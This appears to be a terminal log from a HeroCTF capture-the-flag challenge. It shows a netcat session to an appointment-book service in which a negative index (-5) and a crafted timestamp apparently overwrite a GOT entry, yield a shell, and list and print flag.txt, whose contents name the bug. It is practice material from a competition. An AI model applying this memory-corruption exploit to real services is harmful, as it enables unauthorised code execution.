-5
1970-02-18 21:27:02
1970-02-18 14:27:02

$ nc static-03.heroctf.fr 5000
========== Welcome to your appointment book. ==========

[LOCAL TIME] 2023-05-13 03:24:37

***** Select an option *****
1) List appointments
2) Add an appointment
3) Exit

Your choice: 2
[+] Enter the index of this appointment (0-7): -5
[+] Enter a date and time (YYYY-MM-DD HH:MM:SS): 1970-02-18 14:27:02
[+] Converted to UNIX timestamp using local timezone: 4199222
[+] Enter an associated message (place, people, notes...):

***** Select an option *****
1) List appointments
2) Add an appointment
3) Exit

Your choice: 3

[+] Good bye!
ls
appointment_book
entry.sh
flag.txt
cat flag.txt
Hero{Unch3ck3d_n3g4t1v3_1nd3x_1nt0_G0T_0v3wr1t3_g03s_brrrrrr}